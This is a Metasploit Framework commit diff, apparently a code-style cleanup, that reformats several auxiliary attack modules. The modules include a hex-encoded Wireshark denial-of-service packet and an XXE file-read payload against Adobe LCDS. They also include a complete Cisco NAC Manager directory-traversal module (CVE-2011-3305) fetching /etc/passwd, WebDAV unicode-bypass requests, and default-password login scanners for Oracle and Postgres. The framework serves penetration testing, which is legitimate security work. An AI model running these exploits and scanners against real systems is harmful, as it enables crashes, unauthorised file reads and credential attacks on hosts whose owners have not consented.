big msftidy pass, ping me if there are issues

git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da

modules/auxiliary/dos/wireshark/chunked.rb

@@ -57,8 +57,56 @@ def run
 		p.tcp_sport = datastore['SPORT'].to_i
 		p.tcp_window = 3072
 
-		# That's some mighty fine ASCII right there.
-		p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
+		# The following hex blob contains an HTTP response with a chunked-encoding
+		# length of 0. The ASCII version is below in a block comment.
+		#
+		# We represent it like this to prevent tools from mangling the carriage
+		# returns within it.
+		#
+		p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" +
+			"\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" +
+			"\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" +
+			"\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" +
+			"\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" +
+			"\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" +
+			"\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" +
+			"\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" +
+			"\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" +
+			"\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" +
+			"\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" +
+			"\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" +
+			"\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" +
+			"\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" +
+			"\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" +
+			"\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" +
+			"\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" +
+			"\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" +
+			"\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" +
+			"\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" +
+			"\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" +
+			"\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" +
+			"\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" +
+			"\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" +
+			"\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" +
+			"\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" +
+			"\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+			"\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" +
+			"\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" +
+			"\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" +
+			"\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" +
+			"\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" +
+			"\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" +
+			"\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" +
+			"\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" +
+			"\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" +
+			"\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" +
+			"\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" +
+			"\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" +
+			"\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" +
+			"\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
+			"\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" +
+			"\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" +
+			"\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
 
 		p.recalc
 		capture_sendto(p, rhost)

modules/auxiliary/scanner/http/adobe_xml_inject.rb

@@ -64,7 +64,15 @@ def run_host(ip)
 			"/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL
 		]
 
-		postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]><amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"><body><object type=\"flex.messaging.messages.CommandMessage\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
+		postrequest =  "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"
+		postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"
+		postrequest << "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">"
+		postrequest << "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>"
+		postrequest << "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>"
+		postrequest << "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>"
+		postrequest << "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>"
+		postrequest << "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>"
+		postrequest << "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
 
 		path.each do | check |
 

modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb

@@ -1,84 +1,84 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Auxiliary::WMAPScanServer
-	include Msf::Auxiliary::Scanner
-
-	def initialize
-		super(
-			'Name'        => 'Cisco Network Access Manager Directory Traversal Vulnerability',
-			'Version'     => '$Revision$',
-			'Description' => %q{
-				This module tests whether a directory traversal vulnerablity is present
-				in versions of Cisco Network Access Manager 4.8.x You may wish to change
-				FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
-				},
-			'References'   =>
-				[
-					[ 'CVE', '2011-3305' ],
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WMAPScanServer
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'        => 'Cisco Network Access Manager Directory Traversal Vulnerability',
+			'Version'     => '$Revision$',
+			'Description' => %q{
+				This module tests whether a directory traversal vulnerablity is present
+				in versions of Cisco Network Access Manager 4.8.x You may wish to change
+				FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
+				},
+			'References'   =>
+				[
+					[ 'CVE', '2011-3305' ],
 					[ 'OSVDB', '76080'],
-					[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
-					[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
-				],
-			'Author'      => [ 'nenad' ],
-			'License'     => MSF_LICENSE
-		)
-
-		register_options(
-			[
-				Opt::RPORT(443),
-				OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
-				OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
-			], self.class)
-	end
-
-	def run_host(ip)
-
-		traversal = '../../'
-		part1= '/admin/file_download?tag='
-		part2 = '&fileType=snapshot'
-
-		begin
-			print_status("Attempting to connect to #{rhost}:#{rport}")
-			res = send_request_raw(
-				{
-					'method'  => 'GET',
-					'uri'     => '/admin',
-				}, 25)
-
-			if (res)
-				1.upto(datastore['MAXDIRS']) do |level|
-					try = traversal * level
-					traversalstring = part1 + try + datastore['FILE'] + part2
-					res = send_request_raw(
-						{
-							'method'  => 'GET',
-							'uri'     => traversalstring,
-						}, 25)
-					if (res and res.code == 200)
-						print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
-						break
-					elsif (res and res.code)
-						print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
-					end
-				end
-			end
-
-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-		rescue ::Timeout::Error, ::Errno::EPIPE
-		end
-	end
-end
+					[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
+					[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
+				],
+			'Author'      => [ 'nenad' ],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				Opt::RPORT(443),
+				OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
+				OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
+			], self.class)
+	end
+
+	def run_host(ip)
+
+		traversal = '../../'
+		part1= '/admin/file_download?tag='
+		part2 = '&fileType=snapshot'
+
+		begin
+			print_status("Attempting to connect to #{rhost}:#{rport}")
+			res = send_request_raw(
+				{
+					'method'  => 'GET',
+					'uri'     => '/admin',
+				}, 25)
+
+			if (res)
+				1.upto(datastore['MAXDIRS']) do |level|
+					try = traversal * level
+					traversalstring = part1 + try + datastore['FILE'] + part2
+					res = send_request_raw(
+						{
+							'method'  => 'GET',
+							'uri'     => traversalstring,
+						}, 25)
+					if (res and res.code == 200)
+						print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
+						break
+					elsif (res and res.code)
+						print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
+					end
+				end
+			end
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+	end
+end

modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb

@@ -124,7 +124,9 @@ def run_host(ip)
 
 		return if not conn
 
-		webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
+		webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
+			'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+			'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
 
 		File.open(datastore['DICTIONARY'], 'rb').each do |testf|
 			begin

modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb

@@ -59,7 +59,9 @@ def run_host(ip)
 		vhost = datastore['VHOST'] || wmap_target_host
 		prot  = datastore['SSL'] ? 'https' : 'http'
 
-		webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
+		webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
+			'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+			'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
 
 		begin
 			res = send_request_cgi({

modules/auxiliary/scanner/http/scraper.rb

@@ -1,5 +1,5 @@
 ##
-# $Id: $
+# $Id$
 ##
 
 ##
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize
 		super(
 			'Name'        => 'HTTP Page Scraper',
-			'Version'     => '$Revision: 13183 $',
+			'Version'     => '$Revision$',
 			'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
 			'Author'       => ['et'],
 			'License'     => MSF_LICENSE

modules/auxiliary/scanner/oracle/isqlplus_login.rb

@@ -46,7 +46,8 @@ def initialize
 				OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
 				OptString.new('SID', [ false, 'Oracle SID' ]),
 				OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
-				OptPath.new('USERPASS_FILE',  [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
+				OptPath.new('USERPASS_FILE',  [ false, "File containing users and passwords separated by space, one pair per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
 				OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
 			], self.class)
 

modules/auxiliary/scanner/postgres/postgres_login.rb

@@ -40,9 +40,12 @@ def initialize(info = {})
 
 		register_options(
 			[
-				OptPath.new('USERPASS_FILE',  [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
-				OptPath.new('USER_FILE',      [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
-				OptPath.new('PASS_FILE',      [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
+				OptPath.new('USERPASS_FILE',  [ false, "File containing (space-seperated) users and passwords, one pair per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
+				OptPath.new('USER_FILE',      [ false, "File containing users, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
+				OptPath.new('PASS_FILE',      [ false, "File containing passwords, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
 			], self.class)
 
 		deregister_options('SQL')